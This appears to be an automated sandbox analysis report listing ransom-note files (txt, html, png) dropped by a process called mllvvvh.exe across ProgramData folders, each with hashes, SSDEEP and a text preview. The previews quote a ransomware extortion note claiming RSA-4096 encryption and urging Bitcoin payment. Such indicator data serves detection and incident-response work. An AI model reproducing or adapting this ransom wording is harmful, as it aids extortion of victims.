                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\IdentityCRL\production\temp\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\MF\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\MF\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\MF\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\MapData\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\MapData\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\MapData\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\NetFramework\BreadcrumbStore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\NetFramework\BreadcrumbStore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\NetFramework\BreadcrumbStore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\NetFramework\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\NetFramework\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\NetFramework\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Network\Connections\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Network\Connections\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Network\Connections\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Network\Downloader\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Network\Downloader\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
